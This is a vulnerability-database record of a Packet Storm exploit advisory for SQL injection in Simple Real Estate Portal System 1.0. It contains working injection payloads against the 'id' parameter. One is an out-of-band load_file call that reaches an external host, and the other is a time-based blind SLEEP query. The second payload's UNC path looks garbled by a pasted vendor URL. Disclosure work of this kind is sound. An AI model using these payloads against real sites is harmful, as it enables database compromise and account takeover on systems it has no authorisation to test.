{"id": "PACKETSTORM:166078", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Simple Real Estate Portal System 1.0 SQL Injection", "description": "", "published": "2022-02-21T00:00:00", "modified": "2022-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166078/Simple-Real-Estate-Portal-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-21T16:07:19", "viewCount": 50, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "vulnersScore": 0.1}, "_state": {"dependencies": 1646295998}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166078/sreps10-sql.txt", "sourceData": "`## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.20.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html \n \n \n## Description: \nThe id parameter appears to be vulnerable to SQL injection attacks. \nThe payload '+(select \nload_file('\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http://stupid_asshole.com\\\\foh'))+' \nwas submitted in the id parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nAn external attacker can take control of all accounts on this \nsystem by using this vulnerability! \nWARNING: If this is deployed on an external domain, a subdomain, or \ninternally, this is extremely dangerous! 
\nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: id (GET) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: p=view_estate&id=2'+(select \nload_file('\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html\\\\foh'))+'' \nAND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND 'NnWW'='NnWW \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Simple-Real-Estate-Portal-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/lffled) \n \n \n`\n"}